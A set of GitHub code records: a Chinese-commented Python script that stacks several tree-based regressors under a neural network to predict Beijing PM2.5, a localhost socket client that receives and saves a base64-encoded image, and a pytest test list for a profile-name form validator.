self.nodata[tezheng]]\r\n else:\r\n self.chidata[tezheng] = [(hh - minum) / (maxnum - minum) for hh in self.chidata[tezheng]]\r\n self.nodata[tezheng] = [(ss - minum) / (maxnum - minum) for ss in self.nodata[tezheng]]\r\n if tezheng == self.ziduan:\r\n self.fenmu = maxnum - minum\r\n self.cha = minum\r\n return print('归一化处理完毕')\r\n\r\n # 标准化函数\r\n def Stand(self):\r\n # 在此之前需要把类别型标签去掉,否则会报错\r\n for tezheng in self.chidata:\r\n standnum = np.std(np.array(list(self.chidata[tezheng])), ddof=1) # 计算有偏的标准差\r\n meanum = np.mean(np.array(list(self.chidata[tezheng])))\r\n\r\n if meanum == 0:\r\n self.chidata[tezheng] = [1 for hh in self.chidata[tezheng]]\r\n self.nodata[tezheng] = [1 for ss in self.nodata[tezheng]]\r\n else:\r\n self.chidata[tezheng] = [(hh - standnum) / meanum for hh in self.chidata[tezheng]]\r\n self.nodata[tezheng] = [(ss - standnum) / 
meanum for ss in self.nodata[tezheng]]\r\n if tezheng == self.ziduan:\r\n self.fenmu = standnum\r\n self.cha = meanum\r\n return print('标准化处理完毕')\r\n\r\n # 定义Kfold的函数,也就是将原始的训练数据集分为k对训练数据和验证数据的组合\r\n def Kfold(self):\r\n # 因为每个模型需要将验证数据结合的结果集成起来,为了方便起见,在这里固定每一折数中的数据集合\r\n datanum = self.chidata.values\r\n # 数据集总长度\r\n length = len(datanum)\r\n alist = np.arange(length)\r\n np.random.seed(1990)\r\n np.random.shuffle(alist) # 随机打乱数据对BPNN,SVM而言是有益处的,而对于决策树之类的模型而言没有影响\r\n\r\n # 验证数据的长度\r\n yanlem = int(length / self.k)\r\n\r\n # 存储数据集的字典\r\n datai = {}\r\n datai['predict'] = self.nodata.values\r\n\r\n # 开始处理Kfold\r\n for kk in range(self.k):\r\n datai[kk] = OrderedDict()\r\n if kk == 0:\r\n datai[kk]['train'] = datanum[alist[(kk + 1) * yanlem:]]\r\n datai[kk]['test'] = datanum[alist[: (kk + 1) * yanlem]]\r\n elif kk == self.k - 1:\r\n datai[kk]['train'] = datanum[alist[: kk * yanlem]]\r\n datai[kk]['test'] = datanum[alist[kk * yanlem:]]\r\n else:\r\n datai[kk]['test'] = datanum[alist[kk * yanlem: (kk + 1) * yanlem]]\r\n signlist = list(alist[: kk * yanlem]) + list(alist[(kk + 1) * yanlem:])\r\n datai[kk]['train'] = datanum[signlist]\r\n # 返回的数据集形式{0:{'train':data, 'test':data},……,self.k-1:{'train':data, 'test':data}, 'predict':data}\r\n print('K折处理完毕')\r\n return datai\r\n\r\n\r\n'''\r\n第二部分:第一层的模型运行阶段\r\n'''\r\n# 可以任意添加模型\r\nclass MODELONE:\r\n\r\n def __init__(self, zidan='pm2.5'):\r\n\r\n # 验证数据集的预测结果\r\n self.yanzhneg_pr = []\r\n\r\n # 验证数据集的真实结果\r\n self.yanzhneg_real = []\r\n\r\n # 预测数据集的预测结果\r\n self.predi = []\r\n\r\n # 预测数据集的真实结果\r\n self.preal = []\r\n\r\n # 目标字段名称\r\n self.zi = zidan\r\n\r\n # 数据结构和数据处理类的保持一致,要把验证数据集的输入和真实的输出合二为一\r\n self.datai = {}\r\n\r\n # 记录每个模型最终误差的字典\r\n self.error_dict = OrderedDict()\r\n\r\n # 将第一层的结果转换为何数据结构处理类中一样的数据结构的函数\r\n # 也就是{'train':dataframe, 'predict':dataframe}样式的字典\r\n def DataStru(self):\r\n self.datai['train'] = np.row_stack((np.array(self.yanzhneg_pr), np.array(self.yanzhneg_real))) # 此处添加行\r\n self.datai['predict'] = np.row_stack((np.array(self.predi), np.array(self.preal)))\r\n # 将训练数据转置\r\n datapst = self.datai['train'].T\r\n # 为训练数据定义DataFrame的列名\r\n mingcheng = ['第%s个模型列' % str(dd) for dd in list(range(len(self.datai['train']) - 1))] + [self.zi]\r\n self.datai['train'] = pd.DataFrame(datapst, columns=mingcheng)\r\n\r\n # 将预测数据转置\r\n dapst = self.datai['predict'].T\r\n # 为训练数据定义DataFrame的列名\r\n mingche= ['第%s个模型列' % str(dd) for dd in list(range(len(self.datai['predict']) - 1))] + [self.zi]\r\n self.datai['predict'] = pd.DataFrame(dapst, columns=mingche)\r\n return print('二层的数据准备完毕')\r\n\r\n # 定义均方误差的函数\r\n def RMSE(self, data1, data2):\r\n data1, data2 = np.array(data1), np.array(data2)\r\n subdata = np.power(data1 - data2, 2)\r\n return np.sqrt(np.sum(subdata) / len(subdata - 1))\r\n\r\n # 随机森林\r\n def RF_First(self, data, n_estimators=4000, max_features='auto'):\r\n # 存储每一折中验证数据集的预测结果\r\n yanzhenglist = []\r\n # 存储每一折中验证数据集的真实结果\r\n yanzhenglist_real = []\r\n # 存储每一折中预测数据集的预测结果\r\n prelist = []\r\n\r\n # 存储训练、验证、预测数据的误差\r\n errorlsit = []\r\n # 开始每一折的训练,因为这个折数的字典是有序的,因此不用考虑每一折的顺序。\r\n for zhe in [zheshu for zheshu in data.keys() if zheshu != 'predict']:\r\n model = RF(n_estimators=n_estimators, max_features=max_features)\r\n model.fit(data[zhe]['train'][:, :-1], data[zhe]['train'][:, -1])\r\n # 注意存储验证数据集结果和预测数据集结果的不同\r\n # 训练数据集的预测结果\r\n xul = model.predict(data[zhe]['train'][:, :-1])\r\n # 验证的预测结果\r\n yanre = model.predict(data[zhe]['test'][:, :-1])\r\n #预测的预测结果\r\n prer = model.predict(data['predict'][:, :-1])\r\n\r\n yanzhenglist += 
list(yanre)\r\n yanzhenglist_real += list(data[zhe]['test'][:, -1])\r\n prelist.append(prer)\r\n # 每计算一折后,要计算训练、验证、预测数据的误差\r\n xx = self.RMSE(xul, data[zhe]['train'][:, -1])\r\n\r\n yy = self.RMSE(yanre, data[zhe]['test'][:, -1])\r\n\r\n pp = self.RMSE(prer, data['predict'][:, -1])\r\n\r\n errorlsit.append([xx, yy, pp])\r\n # 针对预测数据集的预测结果计算均值\r\n meanPre = np.mean(np.array(prelist), axis=0)\r\n # 开始结合\r\n self.yanzhneg_pr.append(yanzhenglist)\r\n self.yanzhneg_real = yanzhenglist_real\r\n self.predi.append(meanPre)\r\n self.preal = data['predict'][:, -1]\r\n\r\n # 储存误差\r\n self.error_dict['随机森林'] = np.mean(np.array(errorlsit), axis=0)\r\n return print('1层中的随机森林运行完毕')\r\n\r\n # AdaBoost\r\n def Adaboost_First(self, data, max_depth=50, n_estimators=1000):\r\n # 存储每一折中验证数据集的预测结果\r\n yanzhenglist = []\r\n # 存储每一折中验证数据集的真实结果\r\n yanzhenglist_real = []\r\n # 存储每一折中预测数据集的预测结果\r\n prelist = []\r\n\r\n # 存储训练、验证、预测数据的误差\r\n errorlsit = []\r\n\r\n # 开始每一折的训练\r\n for zhe in [zheshu for zheshu in data.keys() if zheshu != 'predict']:\r\n model = AdaBoostRegressor(DecisionTreeRegressor(max_depth=max_depth),\r\n n_estimators=n_estimators, learning_rate=0.8)\r\n model.fit(data[zhe]['train'][:, :-1], data[zhe]['train'][:, -1])\r\n # 注意存储验证数据集结果和预测数据集结果的不同\r\n # 训练数据集的预测结果\r\n xul = model.predict(data[zhe]['train'][:, :-1])\r\n # 验证的预测结果\r\n yanre = model.predict(data[zhe]['test'][:, :-1])\r\n #预测的预测结果\r\n prer = model.predict(data['predict'][:, :-1])\r\n yanzhenglist += list(yanre)\r\n yanzhenglist_real += list(data[zhe]['test'][:, -1])\r\n prelist.append(prer)\r\n\r\n # 每计算一折后,要计算训练、验证、预测数据的误差\r\n xx = self.RMSE(xul, data[zhe]['train'][:, -1])\r\n\r\n yy = self.RMSE(yanre, data[zhe]['test'][:, -1])\r\n\r\n pp = self.RMSE(prer, data['predict'][:, -1])\r\n\r\n errorlsit.append([xx, yy, pp])\r\n\r\n # 针对预测数据集的预测结果计算均值\r\n meanPre = np.mean(np.array(prelist), axis=0)\r\n # 开始结合\r\n self.yanzhneg_pr.append(yanzhenglist)\r\n self.yanzhneg_real = yanzhenglist_real\r\n self.predi.append(meanPre)\r\n self.preal = data['predict'][:, -1]\r\n # 储存误差\r\n self.error_dict['AdaBoost'] = np.mean(np.array(errorlsit), axis=0)\r\n\r\n return print('1层中的AdaBoost运行完毕')\r\n\r\n # GBDT\r\n def GBDT_First(self, data, max_depth=17, n_estimators=57):\r\n # 存储每一折中验证数据集的预测结果\r\n yanzhenglist = []\r\n # 存储每一折中验证数据集的真实结果\r\n yanzhenglist_real = []\r\n # 存储每一折中预测数据集的预测结果\r\n prelist = []\r\n\r\n # 存储训练、验证、预测数据的误差\r\n errorlsit = []\r\n # 开始每一折的训练\r\n for zhe in [zheshu for zheshu in data.keys() if zheshu != 'predict']:\r\n model = GradientBoostingRegressor(loss='ls', n_estimators=n_estimators, max_depth=max_depth,\r\n learning_rate=0.12, subsample=0.8)\r\n model.fit(data[zhe]['train'][:, :-1], data[zhe]['train'][:, -1])\r\n # 注意存储验证数据集结果和预测数据集结果的不同\r\n # 训练数据集的预测结果\r\n xul = model.predict(data[zhe]['train'][:, :-1])\r\n # 验证的预测结果\r\n yanre = model.predict(data[zhe]['test'][:, :-1])\r\n # 预测的预测结果\r\n prer = model.predict(data['predict'][:, :-1])\r\n yanzhenglist += list(yanre)\r\n yanzhenglist_real += list(data[zhe]['test'][:, -1])\r\n prelist.append(prer)\r\n\r\n # 每计算一折后,要计算训练、验证、预测数据的误差\r\n xx = self.RMSE(xul, data[zhe]['train'][:, -1])\r\n\r\n yy = self.RMSE(yanre, data[zhe]['test'][:, -1])\r\n\r\n pp = self.RMSE(prer, data['predict'][:, -1])\r\n\r\n errorlsit.append([xx, yy, pp])\r\n\r\n # 针对预测数据集的预测结果计算均值\r\n meanPre = np.mean(np.array(prelist), axis=0)\r\n # 开始结合\r\n self.yanzhneg_pr.append(yanzhenglist)\r\n self.yanzhneg_real = yanzhenglist_real\r\n self.predi.append(meanPre)\r\n self.preal = data['predict'][:, -1]\r\n # 储存误差\r\n 
self.error_dict['GBDT'] = np.mean(np.array(errorlsit), axis=0)\r\n\r\n return print('1层中的GBDT运行完毕')\r\n\r\n # LightGBM\r\n def LightGBM_First(self, data, max_depth=9, n_estimators=380):\r\n # 存储每一折中验证数据集的预测结果\r\n yanzhenglist = []\r\n # 存储每一折中验证数据集的真实结果\r\n yanzhenglist_real = []\r\n # 存储每一折中预测数据集的预测结果\r\n prelist = []\r\n\r\n # 存储训练、验证、预测数据的误差\r\n errorlsit = []\r\n # 开始每一折的训练\r\n for zhe in [zheshu for zheshu in data.keys() if zheshu != 'predict']:\r\n model = lgbm.LGBMRegressor(boosting_type='gbdt', objective='regression', num_leaves=1200,\r\n learning_rate=0.17, n_estimators=n_estimators, max_depth=max_depth,\r\n metric='rmse', bagging_fraction=0.8, feature_fraction=0.8, reg_lambda=0.9)\r\n\r\n model.fit(data[zhe]['train'][:, :-1], data[zhe]['train'][:, -1])\r\n # 注意存储验证数据集结果和预测数据集结果的不同\r\n # 训练数据集的预测结果\r\n xul = model.predict(data[zhe]['train'][:, :-1])\r\n # 验证的预测结果\r\n yanre = model.predict(data[zhe]['test'][:, :-1])\r\n # 预测的预测结果\r\n prer = model.predict(data['predict'][:, :-1])\r\n yanzhenglist += list(yanre)\r\n yanzhenglist_real += list(data[zhe]['test'][:, -1])\r\n prelist.append(prer)\r\n # 每计算一折后,要计算训练、验证、预测数据的误差\r\n xx = self.RMSE(xul, data[zhe]['train'][:, -1])\r\n yy = self.RMSE(yanre, data[zhe]['test'][:, -1])\r\n pp = self.RMSE(prer, data['predict'][:, -1])\r\n errorlsit.append([xx, yy, pp])\r\n # 针对预测数据集的预测结果计算均值\r\n meanPre = np.mean(np.array(prelist), axis=0)\r\n # 开始结合\r\n self.yanzhneg_pr.append(yanzhenglist)\r\n self.yanzhneg_real = yanzhenglist_real\r\n self.predi.append(meanPre)\r\n self.preal = data['predict'][:, -1]\r\n # 储存误差\r\n self.error_dict['LightGBM'] = np.mean(np.array(errorlsit), axis=0)\r\n\r\n return print('1层中的LightGBM运行完毕')\r\n\r\n # XGBoost\r\n def XGBoost_First(self, data, max_depth=50, n_estimators=220):\r\n # 存储每一折中验证数据集的预测结果\r\n yanzhenglist = []\r\n # 存储每一折中验证数据集的真实结果\r\n yanzhenglist_real = []\r\n # 存储每一折中预测数据集的预测结果\r\n prelist = []\r\n # 存储训练、验证、预测数据的误差\r\n errorlsit = []\r\n # 开始每一折的训练\r\n for zhe in [zheshu for zheshu in data.keys() if zheshu != 'predict']:\r\n model = xgb.XGBRegressor(max_depth=max_depth, learning_rate=0.1, n_estimators=n_estimators,\r\n silent=True, objective='reg:gamma')\r\n model.fit(data[zhe]['train'][:, :-1], data[zhe]['train'][:, -1])\r\n # 注意存储验证数据集结果和预测数据集结果的不同\r\n # 训练数据集的预测结果\r\n xul = model.predict(data[zhe]['train'][:, :-1])\r\n # 验证的预测结果\r\n yanre = model.predict(data[zhe]['test'][:, :-1])\r\n # 预测的预测结果\r\n prer = model.predict(data['predict'][:, :-1])\r\n yanzhenglist += list(yanre)\r\n yanzhenglist_real += list(data[zhe]['test'][:, -1])\r\n prelist.append(prer)\r\n # 每计算一折后,要计算训练、验证、预测数据的误差\r\n xx = self.RMSE(xul, data[zhe]['train'][:, -1])\r\n yy = self.RMSE(yanre, data[zhe]['test'][:, -1])\r\n pp = self.RMSE(prer, data['predict'][:, -1])\r\n errorlsit.append([xx, yy, pp])\r\n # 针对预测数据集的预测结果计算均值\r\n meanPre = np.mean(np.array(prelist), axis=0)\r\n # 开始结合\r\n self.yanzhneg_pr.append(yanzhenglist)\r\n self.yanzhneg_real = yanzhenglist_real\r\n self.predi.append(meanPre)\r\n self.preal = data['predict'][:, -1]\r\n # 储存误差\r\n self.error_dict['XGBoost'] = np.mean(np.array(errorlsit), axis=0)\r\n return print('1层中的XGBoost运行完毕')\r\n\r\n # CatBoost\r\n def CatBoost_First(self, data, catsign, depth=8, iterations=80000):\r\n\r\n # 存储每一折中验证数据集的预测结果\r\n yanzhenglist = []\r\n # 存储每一折中验证数据集的真实结果\r\n yanzhenglist_real = []\r\n # 存储每一折中预测数据集的预测结果\r\n prelist = []\r\n # 存储训练、验证、预测数据的误差\r\n errorlsit = []\r\n # 开始每一折的训练\r\n for zhe in [zheshu for zheshu in data.keys() if zheshu != 'predict']:\r\n model = 
cb.CatBoostRegressor(iterations=iterations, depth=depth, learning_rate=0.8, loss_function='RMSE')\r\n\r\n model.fit(data[zhe]['train'][:, :-1], data[zhe]['train'][:, -1], cat_features=catsign)\r\n # 注意存储验证数据集结果和预测数据集结果的不同\r\n # 训练数据集的预测结果\r\n xul = model.predict(data[zhe]['train'][:, :-1])\r\n # 验证的预测结果\r\n yanre = model.predict(data[zhe]['test'][:, :-1])\r\n # 预测的预测结果\r\n prer = model.predict(data['predict'][:, :-1])\r\n yanzhenglist += list(yanre)\r\n yanzhenglist_real += list(data[zhe]['test'][:, -1])\r\n prelist.append(prer)\r\n # 每计算一折后,要计算训练、验证、预测数据的误差\r\n xx = self.RMSE(xul, data[zhe]['train'][:, -1])\r\n yy = self.RMSE(yanre, data[zhe]['test'][:, -1])\r\n pp = self.RMSE(prer, data['predict'][:, -1])\r\n errorlsit.append([xx, yy, pp])\r\n # 针对预测数据集的预测结果计算均值\r\n meanPre = np.mean(np.array(prelist), axis=0)\r\n # 开始结合\r\n self.yanzhneg_pr.append(yanzhenglist)\r\n self.yanzhneg_real = yanzhenglist_real\r\n self.predi.append(meanPre)\r\n self.preal = data['predict'][:, -1]\r\n # 储存误差\r\n self.error_dict['CatBoost'] = np.mean(np.array(errorlsit), axis=0)\r\n return print('1层中的CatBoost运行完毕')\r\n\r\n'''\r\n第三部分:第二层的模型运行阶段 可以任意更换模型\r\n'''\r\nclass MODETWO:\r\n\r\n def __init__(self, in_tr_data, out_tr_data, in_pre_data, out_pre, fenmu, cha):\r\n self.xdata = in_tr_data\r\n self.ydata = out_tr_data\r\n\r\n self.xdatapre = in_pre_data\r\n self.ydapre = out_pre\r\n\r\n self.fen = fenmu\r\n\r\n self.cha = cha\r\n pass\r\n\r\n # BP神经网络回归\r\n def BP(self, hiddenlayers=3, hiddennodes=100, learn_rate=0.05, itertimes=50000,\r\n batch_size=200, activate_func='sigmoid', break_error=0.00000043):\r\n loss_trrr, loss_pree, sign, fir = bp.Ten_train(self.xdata, self.ydata, self.xdatapre, self.ydapre,\r\n hiddenlayers=hiddenlayers, hiddennodes=hiddennodes,\r\n learn_rate=learn_rate, itertimes=itertimes,\r\n batch_size=batch_size, activate_func=activate_func,\r\n break_error=break_error)\r\n # 因为上面的得出的RMSE是数据变换后的,因此要转换到原始的维度\r\n loss_trrr = np.array(loss_trrr) * self.fen\r\n\r\n loss_pree = np.array(loss_pree) * self.fen\r\n\r\n return loss_trrr, loss_pree, sign, fir\r\n\r\n'''\r\n第四部分:绘制图,绘制第一层各个模型中训练,验证数据的误差,\r\n以及最终的预测数据的真实值和误差值的对比\r\n'''\r\n# 定义绘制第一层模型训练、验证、预测数据的误差的函数\r\n# 根据字典绘制不同参数下评分的对比柱状图\r\ndef Plot_RMSE_ONE_Stacking(exdict, kaudu=0.2):\r\n '''\r\n :param exdict: 不同模型的RMSE 最小二乘回归误差的平方根\r\n :return: 柱状图\r\n '''\r\n # 参数组合列表\r\n palist = exdict.keys()\r\n # 对应的训练数据的评分\r\n trsore = [exdict[hh][0] for hh in palist]\r\n # 对应的测试数据的评分\r\n tesore = [exdict[hh][1] for hh in palist]\r\n # 对应的预测数据的评分\r\n presore = [exdict[hh][2] for hh in palist]\r\n\r\n # 开始绘制柱状图\r\n fig, ax = plt.subplots()\r\n # 柱的个数\r\n ind = np.array(list(range(len(trsore))))\r\n # 绘制柱状\r\n ax.bar(ind - kaudu, trsore, kaudu, color='SkyBlue', label='训练')\r\n ax.bar(ind, tesore, kaudu, color='IndianRed', label='测试')\r\n ax.bar(ind + kaudu, presore, kaudu, color='slateblue', label='预测')\r\n # xy轴的标签\r\n ax.set_ylabel('RMSE')\r\n ax.set_xlabel('Stacking第一层中的模型')\r\n # 设置刻度\r\n ax.set_xticks(ind)\r\n ax.set_xticklabels(palist)\r\n\r\n ax.grid()\r\n\r\n leg = ax.legend(loc='best', ncol=3, shadow=True, fancybox=True)\r\n leg.get_frame().set_alpha(0.8)\r\n plt.title('Stacking第一层中模型的RMSE')\r\n plt.savefig(r'C:\\Users\\GWT9\\Desktop\\Stacking_pm25.jpg')\r\n bot.file_helper.send_image(r'C:\\Users\\GWT9\\Desktop\\Stacking_pm25.jpg')\r\n return '一层不同模型对比'\r\n\r\n# 最终的预测数据的真实值和误差值的对比\r\n# 按照误差值从小到大排列的数据\r\ndef Pailie(realr, modelout, count=90):\r\n '''\r\n :param real: 预测数据集真实的数据\r\n :param modelout: 预测数据集的模型的输出值\r\n :param count: 进行数据对比的条数\r\n 
:return: 按照差值从小到大排列的数据\r\n '''\r\n relal_num = np.array(realr)\r\n modelout_num = np.array(modelout)\r\n # 随机选取\r\n fu = np.random.choice(list(range(len(realr))), count, replace=False)\r\n show_real, show_model = relal_num[fu], modelout_num[fu]\r\n # 计算差值\r\n sunnum = show_real - show_model\r\n # 首先组合三个数据列表为字典\r\n zuhedict = {ii: [show_real[ii], show_model[ii], sunnum[ii]] for ii in range(len(show_model))}\r\n # 字典按着值排序\r\n zhenshi = []\r\n yucede = []\r\n chazhi = []\r\n # 按着差值从大到小\r\n for jj in sorted(zuhedict.items(), key=lambda gy: gy[1][2]):\r\n zhenshi.append(jj[1][0])\r\n yucede.append(jj[1][1])\r\n chazhi.append(jj[1][2])\r\n return zhenshi, yucede, chazhi\r\n\r\n# 绘制预测值,真实值对比折线,以及与两值的误差柱状图\r\ndef recspre(yzhenshide, yyucede):\r\n # 获得展示的数据\r\n yreal, ypre, cha = Pailie(yzhenshide, yyucede)\r\n plt.figure()\r\n ax = plt.subplot(111)\r\n plt.grid()\r\n dign = np.arange(len(yreal))\r\n # 绘制真实值\r\n ax.scatter(dign, yreal, label='真实值', lw=2, color='blue', marker='*')\r\n # 绘制预测值\r\n ax.plot(dign, ypre, label='预测值', lw=2, color='red', linestyle='--', marker='.')\r\n # 绘制误差柱状图\r\n ax.bar(dign, cha, 0.1, label='真实值减去预测值', color='k')\r\n # 绘制0线\r\n ax.plot(dign, [0] * len(dign), lw=2, color='k')\r\n\r\n ax.set_ylim((int(min(cha)) - 1, int(max([max(yreal), max(ypre)]))))\r\n ax.set_xlim((0, len(dign)))\r\n\r\n ax.legend(loc='best')\r\n ax.set_title('北京市Pm2.5预测数据集结果对比')\r\n plt.savefig(r'C:\\Users\\GWT9\\Desktop\\Stacking_duibi.jpg')\r\n bot.file_helper.send_image(r'C:\\Users\\GWT9\\Desktop\\Stacking_duibi.jpg')\r\n return '完毕'\r\n\r\n# 绘制2条对比曲线\r\ndef plotcurve(trainone, pretwo):\r\n fig, axs = plt.subplots(2, 1, sharex=True)\r\n fig.subplots_adjust(hspace=0.1)\r\n axs[0].plot(range(len(trainone)), trainone, label='训练', lw=3, color='maroon')\r\n axs[0].legend()\r\n axs[1].plot(range(len(pretwo)), pretwo, label='验证', lw=3, color='sienna')\r\n axs[1].legend()\r\n plt.xlabel('迭代次数')\r\n axs[0].set_title('第2层模型:BPNN中训练和验证数据的成本函数值')\r\n plt.savefig(r'C:\\Users\\GWT9\\Desktop\\Stacking_errorr.jpg')\r\n bot.file_helper.send_image(r'C:\\Users\\GWT9\\Desktop\\Stacking_errorr.jpg')\r\n\r\n'''\r\n第五部分:Stacking主函数\r\n'''\r\n\r\nif __name__ == \"__main__\":\r\n # 第一层6个模型:随机森林,AdaBoost,GBDT,LightGBM,XGBoost,CatBoost\r\n\r\n # 下面依次为每个模型建立数据\r\n # 随机森林、AdaBoost,GBDT,LIghtGNM,XGBoost都是一样的\r\n rf_data = DATA()\r\n rf_data.CAtoDI() # 标签数字化\r\n data_rf = rf_data.Kfold() # 折数\r\n\r\n # CatBoost\r\n cat_data = DATA() # 不用处理\r\n data_cat = cat_data.Kfold() # 折数\r\n\r\n # 开始建立Stacking第一层的模型\r\n one_stacking = MODELONE()\r\n # 随机森林\r\n one_stacking.RF_First(data_rf)\r\n # AdaBoost\r\n one_stacking.Adaboost_First(data_rf)\r\n # GBDT\r\n one_stacking.GBDT_First(data_rf)\r\n # LightGBM\r\n one_stacking.LightGBM_First(data_rf)\r\n # XGBoost\r\n one_stacking.XGBoost_First(data_rf)\r\n # CatBoost\r\n one_stacking.CatBoost_First(data_cat, cat_data.catsign)\r\n\r\n # 第二层的数据准备\r\n one_stacking.DataStru()\r\n data_two = one_stacking.datai\r\n\r\n # 第二层的数据处理\r\n erce_data = DATA(datadict=data_two)\r\n erce_data.Normal()\r\n # 将训练数据集分为训练和验证数据集\r\n redata = erce_data.Kfold()\r\n #\r\n\r\n # 第二层建模,在这里不在进行交叉验证,因此只选一个数据集\r\n stacking_two = MODETWO(redata[0]['train'][:, :-1],\r\n np.array([redata[0]['train'][:, -1]]).T,\r\n redata[0]['test'][:, :-1],\r\n np.array([redata[0]['test'][:, -1]]).T,\r\n erce_data.fenmu, erce_data.cha)\r\n\r\n # 训练的输出值,预测的输出值, 每一次迭代训练和预测的误差\r\n lossrain, losspre, signi, gir = stacking_two.BP()\r\n\r\n\r\n\r\n # 训练完成后读取最优的参数,在计算最终的预测结果\r\n graph = tf.train.import_meta_graph(\"./pm25-%s.meta\" % signi)\r\n 
ses = tf.Session()\r\n graph.restore(ses, tf.train.latest_checkpoint('./'))\r\n op_to_restore = tf.get_default_graph().get_tensor_by_name(\"Sigmoid_%s:0\" % gir) # 这个tensor的名称和激活函数有关系,需要去BP的程序中获得\r\n w1 = tf.get_default_graph().get_tensor_by_name(\"x_data:0\")\r\n feed_dict = {w1: redata['predict'][:, :-1]}\r\n dgsio = ses.run(op_to_restore, feed_dict)\r\n\r\n preout = erce_data.fenmu * dgsio.T[0] + erce_data.cha\r\n\r\n # 绘制第一层中各个模型的误差图\r\n Plot_RMSE_ONE_Stacking(one_stacking.error_dict)\r\n # 绘制预测值,真实值对比折线,以及与两值的误差柱状图\r\n recspre(erce_data.fenmu * erce_data.nodata.values[:, -1] + erce_data.cha, preout)\r\n # 绘制第二层模型中的训练和验证误差\r\n plotcurve(lossrain, losspre)","repo_name":"Anfany/Machine-Learning-for-Beginner-by-Python3","sub_path":"Stacking/Stacking_Regression_pm25.py","file_name":"Stacking_Regression_pm25.py","file_ext":"py","file_size_in_byte":30146,"program_lang":"python","lang":"zh","doc_type":"code","stars":405,"dataset":"github-code","pt":"3"} +{"seq_id":"7405820901","text":"from socket import socket\nfrom json import loads\nfrom base64 import b64decode\n\ndef main():\n client = socket()\n client.connect(('localhost', 5566))\n print('连接服务器成功')\n # 定义一个保存二进制数据的对象a\n in_data = bytes()\n # 由于不知道服务器发送的数据有多大每次接收 1024 字节\n data = client.recv(1024)\n while data:\n # 将收到的数据拼接起来\n in_data += data\n data = client.recv(1024)\n # 将收到的二进制数据解码成 JSON 字符串并转换成字典\n # loads 函数的作用就是将 JSON 字符串转成字典对象\n my_dict = loads(in_data.decode('utf-8'))\n filename = my_dict['filename']\n filedata = my_dict['filedata'].encode('utf-8')\n with open('filedir/' + filename, 'wb') as f:\n # 将 base64 格式的数据解码成二进制数据并写入文件\n f.write(b64decode(filedata))\n print('图片已保存')\n\n# \"\"\"\n# 使用了 JSON 作为数据传输格式(对数据进行了序列化和反序列化的操作),但是 JSON 并不能携带二进制数据,\n# 因此对图片的二进制数据进行了 Base64 编码的处理.\n# > Base64 是一种用 64 个字符表示所有二进制数据的编码方式,通过将二进制数据每 6 位一组的方式重新组织,\n# > 刚好可以使用 0~9 的数字,大小写字母以及\"+\"和\"/\"总共64个字符表示从 000000 到 111111 的 64 种状态.\n# \"\"\"\n\nif __name__ == \"__main__\":\n main()","repo_name":"Dosimz/Python-100-Days-Study-Notes","sub_path":"基础心法第5层--心动/基于传输层协议的套接字编程/多线程图片客户端.py","file_name":"多线程图片客户端.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"zh","doc_type":"code","stars":79,"dataset":"github-code","pt":"3"} +{"seq_id":"29025084507","text":"import pytest\nfrom staff.person_profile.forms.head import HeadForm\n\n\nDEFAULT_POST_DATA = {\n 'first_name': 'Владимир',\n 'last_name': 'Спасский',\n 'middle_name': 'Климентович',\n 'first_name_en': 'Volodymyr',\n 'last_name_en': 'Spasskyi',\n 'position': 'разработчик',\n 'position_en': 'software developer\\r\\nnew line',\n}\nNO_ERRORS = {}\n\n\ndef _head_post_data(**kwargs):\n post_data = DEFAULT_POST_DATA.copy()\n post_data.update(kwargs)\n return post_data\n\n\nEDIT_HEAD_CASES = [\n # (<post data>: {<field_name>: <error_key>}),\n # valid\n (_head_post_data(), NO_ERRORS),\n (_head_post_data(\n preferred_name='Виктор Разработчик',\n preferred_name_en='Victor Developer',\n ), NO_ERRORS),\n (\n _head_post_data(\n first_name='Анна-Мария', last_name='Петров-Во ́дкин',\n middle_name='Зурабович Церетелиевич',\n first_name_en='Do Re Mi', last_name_en='Fa-Sol-la',\n ),\n NO_ERRORS\n ),\n (\n _head_post_data(\n first_name='Марина(Ґал\\'я)', last_name='Öбама(Усіновä)',\n middle_name='Ваçил\\'ьевнÄ',\n first_name_en='Galina', last_name_en='Brusnichkina',\n position='Должность(не моя)', position_en='Yo ́'\n ),\n {\n 'position_en': 'staff-invalid_latin_field',\n }\n ),\n (\n _head_post_data(\n first_name_en='Ga ́lina', last_name_en='Brusnichkina(Niyazova)',\n ),\n NO_ERRORS\n ),\n\n # 
invalid\n (\n _head_post_data(\n first_name='Марина 2-я', last_name='У', middle_name='Тимуровна()',\n first_name_en='Русские', last_name_en='символы',\n position_en='калькулятор'\n ),\n {\n 'first_name': 'staff-invalid_name_field',\n 'last_name': 'staff-invalid_name_field',\n 'middle_name': 'staff-invalid_name_field',\n 'first_name_en': 'staff-invalid_name_field',\n 'last_name_en': 'staff-invalid_name_field',\n 'position_en': 'staff-invalid_latin_field',\n }\n ),\n\n (\n _head_post_data(\n first_name='-Минусик', last_name='(Скобкин)', middle_name='\\'квчк',\n first_name_en='Joseph--mcDonaldas', last_name_en='X Y-Z',\n ),\n {\n 'first_name': 'staff-invalid_name_field',\n 'last_name': 'staff-invalid_name_field',\n 'middle_name': 'staff-invalid_name_field',\n 'first_name_en': 'staff-invalid_name_field',\n 'last_name_en': 'staff-invalid_name_field',\n }\n ),\n\n (\n _head_post_data(\n first_name='', last_name='', middle_name='(NotAtAll)',\n first_name_en='', last_name_en='', position=''\n ),\n {\n 'first_name': 'default-field-required',\n 'last_name': 'default-field-required',\n 'middle_name': 'staff-invalid_name_field',\n 'first_name_en': 'default-field-required',\n 'last_name_en': 'default-field-required',\n 'position': 'default-field-required',\n }\n ),\n\n (\n _head_post_data(\n first_name=(\n 'Гиясаддин Абуль-Фатх Омар ибн Ибрахим аль-Хайям Нишапури'\n ),\n last_name=(\n 'Гиясаддин Абуль-Фатх Омар ибн Ибрахим аль-Хайям Нишапури '\n 'Гиясаддин Абуль-Фатх Омар ибн Ибрахим аль-Хайям Нишапури'\n ),\n middle_name=(\n 'очень длинное отчество очень длинное '\n 'отчество очень длинное отчество'\n ),\n first_name_en=(\n 'longlonglonglonglonglonglonglonglonglonglonglonglonglonglong'\n ),\n last_name_en=(\n 'longlonglonglonglonglonglonglonglonglonglonglonglong'\n 'longlonglonglonglonglonglonglonglonglonglonglonglong'\n )\n ),\n {\n 'first_name': 'default-field-max_length',\n 'last_name': 'default-field-max_length',\n 'middle_name': 'default-field-max_length',\n 'first_name_en': 'default-field-max_length',\n 'last_name_en': 'default-field-max_length',\n }\n ),\n]\n\n\n@pytest.mark.parametrize('test_data', EDIT_HEAD_CASES)\ndef 